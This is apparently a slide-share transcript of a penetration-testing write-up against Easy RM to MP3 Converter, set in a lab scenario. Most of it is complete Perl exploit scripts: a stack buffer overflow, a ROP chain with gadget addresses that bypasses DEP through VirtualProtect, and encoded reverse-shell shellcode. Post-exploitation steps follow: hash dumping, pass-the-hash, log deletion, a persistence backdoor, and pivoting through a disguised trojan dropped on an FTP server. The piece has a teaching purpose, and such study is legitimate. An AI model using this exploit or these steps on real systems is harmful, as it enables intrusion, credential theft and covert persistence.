Browser exploitation SEC-T 2019 stockholmJameel Nabbo
 
TYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase frameworkTYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase frameworkChristian Trabold
 
Jboss Exploit
Jboss ExploitJboss Exploit
Jboss Exploitdrkimsky
 
Writing & Sharing Great Modules on the Puppet Forge
Writing & Sharing Great Modules on the Puppet ForgeWriting & Sharing Great Modules on the Puppet Forge
Writing & Sharing Great Modules on the Puppet ForgePuppet
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Symfony finally swiped right on envvars
Symfony finally swiped right on envvarsSymfony finally swiped right on envvars
Symfony finally swiped right on envvarsSam Marley-Jarrett
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: BackendVõ Duy Tuấn
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsMarcelo Pinheiro
 

Ähnlich wie Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit (20)

Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Burn down the silos! Helping dev and ops gel on high availability websites
Burn down the silos! Helping dev and ops gel on high availability websitesBurn down the silos! Helping dev and ops gel on high availability websites
Burn down the silos! Helping dev and ops gel on high availability websites
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorial
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and Puppet
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / Webgrind
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Node.js basics
Node.js basicsNode.js basics
Node.js basics
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp Boston
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Book
BookBook
Book
 
Browser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholmBrowser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholm
 
TYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase frameworkTYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase framework
 
Jboss Exploit
Jboss ExploitJboss Exploit
Jboss Exploit
 
Writing & Sharing Great Modules on the Puppet Forge
Writing & Sharing Great Modules on the Puppet ForgeWriting & Sharing Great Modules on the Puppet Forge
Writing & Sharing Great Modules on the Puppet Forge
 
Web application security
Web application securityWeb application security
Web application security
 
Symfony finally swiped right on envvars
Symfony finally swiped right on envvarsSymfony finally swiped right on envvars
Symfony finally swiped right on envvars
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability Systems
 

Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

  • 1. Penetration Testing for Easy RM to MP3 Converter Application & Post Exploit Author: JongWon Kim dikien2012@gmail.com http://dikien2012.blogspot.com 1
  • 2. Table of Contents Penetration Testing for Easy RM to MP3 Converter Application.............................................................1 Table of Contents……….........................................................................................................................2 Abstract..................................................................................................................................................3 Setting up the Testing Enviroment.........................................................................................................4 Strategy for the Application Testing........................................................................................................5 Dynamic Analysis...................................................................................................................................6 Strategy for the Post Exploit.................................................................................................................15 Post Exploit...........................................................................................................................................16 Conclusion............................................................................................................................................21 http://dikien2012.blogspot.com 2
  • 3. Abstract Advanced Persistent Attack nowadays has threatened our valuable assets. Many exploits that threaten end point users and corporation have been researched day by day. No matter how operation system protection methods works well, privilege escalation could be easy just because a vulnerable application. Many corporations defends their information by setting firewall, WAF, and SLB, but only one vulnerable application could make these powerful protection line incapacitated. In this paper, I will analysis this application and suggest the solution within windows environment. This is imaginary scenario for this paper. My client requests me sometimes „Easy RM to MP3 Converter ‟exits when opening a m3u file that contains an overly long strings. First, I figure out this application has a vulnerability with stack based buffer overflow. I build the ROP based exploit to test. Second, I will attack the machine running the application with the exploitation and do post exploit. http://dikien2012.blogspot.com 3
  • 4. Setting up the Testing Environment  Backtrack5 R1(Attack Machine, 192.168.10.10)  Windows SP2 (First Victim for the application penetration testing, 192.168.10.5, 10.10.10.5)  Windows SP3(Second Victim for pivot, 10.10.10.20)  Immunity Debugger 1.83  Easy RM to MP3 Converter(2.7.3.700, Vulnerable Application)  Metasploit Framework  Social Engineering Toolkit  ALFTP 5.22 Testing Environment Explanation : The default DEP, Data Execute Protection, setting for Windows SP2 is OptIn(All programs, process, services on the windows system are protected, except for processes in the exception list). Before taking a penetration testing, I manually have changed it to OptOut by adding „/noexecute=policy‟ to the end of the line that refers to the OS boot configuration. OptOut option is that all programs, processes, services on the Windows system are protected, except for processes in the exception list. There is no the exception list for this testing. http://dikien2012.blogspot.com 4
  • 5. Strategy for the Application Testing I use one of the windows function calls named VirtualProtect() to bypass DEP. This function change the access protection level of a given memory page, allowing to make the location where my payload resides executable. I have to set up the stack with the correct parameters for that function first. I can‟t overwrite return address directly to my payload or use SEH chains because the payload will not get executed on stack since DEP is OptOut. Below is the prototype of VirtualProtect() : BOOL WINAPI VirtualProtect( __in LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flNewProtect, __out PDWORD lpflOldProtect );  Return address: VirtualProtect () will return to the pointer to the location where the address of the payload on the stack  lpAddress: A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.  dwSize: The size of the region whose access protection attributes are to be changed, in bytes.  flNewProtect: Option that specifies the new protection 0x00000040 PAGE_EXECUTE_READWRITE  lpflOldProtect : Pointer to variable that will receive the previous access protection value. http://dikien2012.blogspot.com 5
  • 6. Dynamic Analysis At first, I calculate the offset between registers and the buffer with the perl script to make a vulnerable m3u file and run the application attached debugger with the m3u file. Below is source code to make an m3u file. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26058; $junk = $junk . "XXXX"; my $eip = "BBBB"; # This will overwrite the EIP. my $nops = "x90"x240; my $shellcode =””; my $rest = "C"x300; my $payload = $junk.$eip.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== [ Figure 1. EIP is overwritten with BBBB ] http://dikien2012.blogspot.com 6
  • 7. 42424242 is hexadecimal representation for BBBB. There is another method to find offset with mona.py by command line below debugger „!mona pattern_create 3000‟. I add this unique pattern to the script. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26000; my $pattern =””; # msf unique pattern is here my $nops = "x90"x240; my $shellcode = ""; my $rest = "C"x300; my $payload = $junk.$pattern.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== After crashing, I get more useful information by command „!mona suggest‟. On top of that, I check if the payload is corrupt or not by command „!mona compare -f “C:Documents and SettingsAdministrator바탕 화면RM2MP3Converterpattern.txt‟. I create gatgets to make a ROP chains by command „!mona rop -n -cm aslr=false,safeseh=false,rebase=false‟. After making the ROP chains, EIP will point the shellcode that I want to get executed. I made the shellcode with msfpayload and msfencode and added the script to make a final exploit m3u file. [ Figure 2. Making a Payload to connect back to attacker machine ] My final exploit is below. Stage-1 : Saving stack pointer to EAX and EDI registers and jumping over the parameters Stage-2 : Crafting parameters lead to setting up the arguments of a function that would allow me to disable DEP or bypass it. http://dikien2012.blogspot.com 7
  • 8. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26064; my $eip = pack('V',0x7C84483D); # RETN from kernel32.dll my $junk2 = "AAAA"; # Compensate for ########### Stage-1 Started here ########### ########### Put stack pointer in EDI & EAX ########### my $rop = pack('V',0x5a489ee7); # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll $rop = $rop.pack('V',0x77bce842); # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll $rop = $rop."AAAA"; # Compensate for $rop = $rop.pack('V',0x1001653D); # ADD ESP,20//RETN from MSRMfilter03.dll ########### Parameters fpr VirtualProtect() ########### my $parameters =pack('V',0x7C801AD0); # Address for VirtualProtect () $parameters = $parameters."WWWW"; # Return address $parameters = $parameters."XXXX"; # lpaddress $parameters = $parameters."YYYY"; # Size $parameters = $parameters."ZZZZ"; # flNewProtect $parameters = $parameters.pack('V',0x10035005); # Writeable address $parameters = $parameters.("H" x 8); # Padding ########### Stage-1 finished ########### ########### Stage-2 starts is below ########### ########### First Parameter ############ my $rop2 = pack('V',0x77427175); # XCHG EDI,ESI//RETN 8 http://dikien2012.blogspot.com 8
  • 9. ########### Make EAX point at the shellcode ########### $rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP from MSRMfilter03.dll $rop2 = $rop2."AAAA"; # Padding - Compensate for RETN 8 $rop2 = $rop2."AAAA"; $rop2 = $rop2."AAAA"; ########### Second Parameter, RETN is in EAX ############ $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN $rop2 = $rop2."AAAA"; #Padding ########## EAX now contains Stack Pointer ############# $rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN ########## Make EAX point at Shellcode again ########### $rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; #Padding ########## Increase ESI with 4 ############# $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); ########## Write lpADDress ############ $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI $rop2 = $rop2."AAAA"; # Padding http://dikien2012.blogspot.com 9
  • 10. ########## Save EAX in ESI again ########## $rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX POP ESI RETN ########## Create Size Set EAX to 300 or so ########## $rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN $rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding ########## Write Size, First Set ESI to Right Place ########## $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); ########## 3th Parameter ########## $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI $rop2 = $rop2."AAAA"; # Padding ########## Save EAX in ESI again ########## $rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN ########## flNewProject 0x40 ########## $rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN $rop2 = $rop2.pack('V',0x1002DC41); # ADD EAX,40//POP EBP//RETN http://dikien2012.blogspot.com 10
  • 11. $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 ########## 4th Parameter ########## $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//RETN $rop2 = $rop2."AAAA"; # Padding ########## Return to virtual protect pointer, Compensate for 2 POPs instruction ########## $rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret $rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret ########## Change ESP & Back to the origin ########## $rop2 = $rop2.pack('V',0x73D35CA8); # PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll my $nops = "x90"x240; $shellcode = "x89xe0xd9xf6xd9x70xf4x5ax4ax4ax4ax4ax4ax4a" . "x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" . "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" . "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" . "x75x4ax49x49x6cx49x78x6bx39x43x30x75x50x53" . "x30x73x50x4ex69x4dx35x44x71x6ex32x62x44x6c" . "x4bx62x72x30x30x4cx4bx46x32x56x6cx6ex6bx30" . "x52x75x44x6ex6bx61x62x56x48x74x4fx4dx67x42" . "x6ax65x76x30x31x49x6fx66x51x79x50x6cx6cx75" . http://dikien2012.blogspot.com 11
  • 12. "x6cx45x31x53x4cx35x52x56x4cx71x30x59x51x48" . "x4fx54x4dx37x71x7ax67x6dx32x5ax50x76x32x66" . "x37x4ex6bx56x32x44x50x6ex6bx37x32x37x4cx55" . "x51x5ax70x4cx4bx63x70x30x78x6fx75x39x50x32" . "x54x62x6ax47x71x48x50x30x50x6ex6bx73x78x55" . "x48x4ex6bx46x38x57x50x55x51x6ex33x59x73x47" . "x4cx42x69x4ex6bx75x64x4cx4bx33x31x4bx66x55" . "x61x4bx4fx55x61x79x50x4ex4cx59x51x7ax6fx54" . "x4dx55x51x6ax67x66x58x49x70x30x75x58x74x65" . "x53x31x6dx5ax58x37x4bx63x4dx46x44x73x45x39" . "x72x31x48x4ex6bx76x38x77x54x65x51x59x43x42" . "x46x4ex6bx56x6cx50x4bx4ex6bx31x48x45x4cx43" . "x31x79x43x6cx4bx45x54x4ex6bx77x71x4ex30x4c" . "x49x43x74x54x64x65x74x61x4bx71x4bx73x51x70" . "x59x52x7ax66x31x69x6fx49x70x62x78x33x6fx61" . "x4ax6cx4bx45x42x4ax4bx4bx36x61x4dx71x78x76" . "x53x54x72x45x50x57x70x75x38x52x57x33x43x66" . "x52x73x6fx63x64x42x48x30x4cx52x57x66x46x57" . "x77x4bx4fx78x55x4cx78x4ex70x65x51x75x50x67" . "x70x71x39x38x44x71x44x70x50x70x68x51x39x6b" . "x30x50x6bx77x70x59x6fx38x55x42x70x52x70x46" . "x30x62x70x67x30x66x30x61x50x70x50x42x48x7a" . "x4ax44x4fx79x4fx39x70x4bx4fx58x55x4ax37x43" . "x5ax67x75x65x38x69x50x4dx78x35x5ax37x7ax35" . "x38x35x52x33x30x56x71x51x4cx4dx59x38x66x51" . "x7ax54x50x62x76x66x37x35x38x4ex79x49x35x74" . "x34x71x71x69x6fx6ax75x4fx75x6bx70x42x54x56" . "x6cx49x6fx62x6ex74x48x63x45x7ax4cx32x48x6c" . "x30x6fx45x4ex42x63x66x49x6fx68x55x61x7ax47" . http://dikien2012.blogspot.com 12
  • 13. "x70x61x7ax34x44x50x56x36x37x75x38x63x32x4b" . "x69x69x58x73x6fx49x6fx39x45x4ex6bx57x46x31" . "x7ax47x30x33x58x55x50x44x50x47x70x73x30x32" . "x76x62x4ax65x50x32x48x66x38x69x34x61x43x59" . "x75x69x6fx68x55x5ax33x56x33x61x7ax55x50x61" . "x46x32x73x50x57x30x68x66x62x68x59x48x48x53" . "x6fx6bx4fx39x45x47x71x48x43x57x59x58x46x4e" . "x65x4cx36x30x75x68x6cx6fx33x41x41"; my $rest = "C"x300; my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== Since the shellcode is turning back to the backtrack machine, I use multi handler on msfconosole to listen on 4444 tcp port. [ Figure 3. Listening on 4444 tcp port ] http://dikien2012.blogspot.com 13
  • 14. I create the m3u file with above script and open it with the application. [ Figure 4. Open the exploit.m3u to crach the application ] I get the meterpreter shell from first victim machine.. [ Figure 5. Get the Meterpreter shell from the first Victim Machine ] http://dikien2012.blogspot.com 14
  • 15. Strategy for the Post Exploit 1. Understanding the Victim better 2. Privilege Escalation 3. Deleting Logs and Killing Monitoring software 4. Collecting Data, and Executing programs 5. Backdoors and Rootkits 6. Using victims as a Pivot to hack deeper into the network http://dikien2012.blogspot.com 15
  • 16. Post Exploit 1. Understaning the Victim better [ Figure 5. Network Information ] I figure out password hashes and can crack it with JohnTheRipper. If I cannot figure out what the original passwords, I can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. [ Figure 6. Password Hashes ] I can look for more vulnerable applications, available tokens, and routing table. [ Figure 7. Token Lists ] http://dikien2012.blogspot.com 16
  • 17. [ Figure 8. Running applications ] [ Figure 9. Routing Table ] I notice this machine is running on ALFTP, it will be used on social engineering attack. [ Figure 10. ALFTP is running ] 2. Privilege Escalation After getting the system, I safely migrate 1072(svchost.exe) via technique 1. [ Figure 11. Privilege Escalation Success ] http://dikien2012.blogspot.com 17
  • 18. 3. Deleting Logs and Killing Monitoring software I try to kill anti virus software, but there is no it and get rid of event logs. [ Figure 12. Killing AV and deleting event logs ] 4. Collecting Data, and Executing programs [ Figure 13. Collecting txt files ] 5. Backdoors and Rootkits I run persistence and tell Windows to auto start the agent at boot time, wait 100 seconds before connection retries to run on port 443 and connect to IP 192.168.10.5. [ Figure 14. Installing the Backdoor ] http://dikien2012.blogspot.com 18
  • 19. 6. Using victims as a Pivot to hack deeper into the network I found the first victim machine has two network cards of different subnets, which will be inner network disconnected from outside. I go inside using first victim machine working tunnel. [ Figure 15. Setting routing table ] [ Figure 16. Running scan via session 1 ] I am aware the second victim machine (10.10.10.20) has open port for 139, which means it could have vulnerability for „MS08-067‟. [ Figure 17. Port Scan ] I make a malicious file with fake name (alsong.exe) that works for connecting back to attacker machine with meterpreter shell. I find the working directory for FTP Server on first victim machine and upload it. [ Figure 18. Uploading the malicious file ] http://dikien2012.blogspot.com 19
  • 20. Check it out malicious file is on the FTP Server. Second victim download and execute it. [ Figure 19. Uploading the malicious file ] New session is created by second victim machine. [ Figure 20. Attak Success on second Victim machine ] http://dikien2012.blogspot.com 20
  • 21. Conclusion I showed vulnerable application could threaten the inner intranet. It is not always latest OS protection mechanism, Firewall, and SLB can protect our assets. It is vital that not only developers should ensure their secure coding from preventing from such as buffer over flow or heap spray attack, but also end point users should be aware security consciousness whose they don‟t have to use applications they don‟t use for work and always updated to the latest condition. It is obvious that essential database should be away from normal staffs completely. As is frequently pointed out, we should keep in mind attack could happen inside. http://dikien2012.blogspot.com 21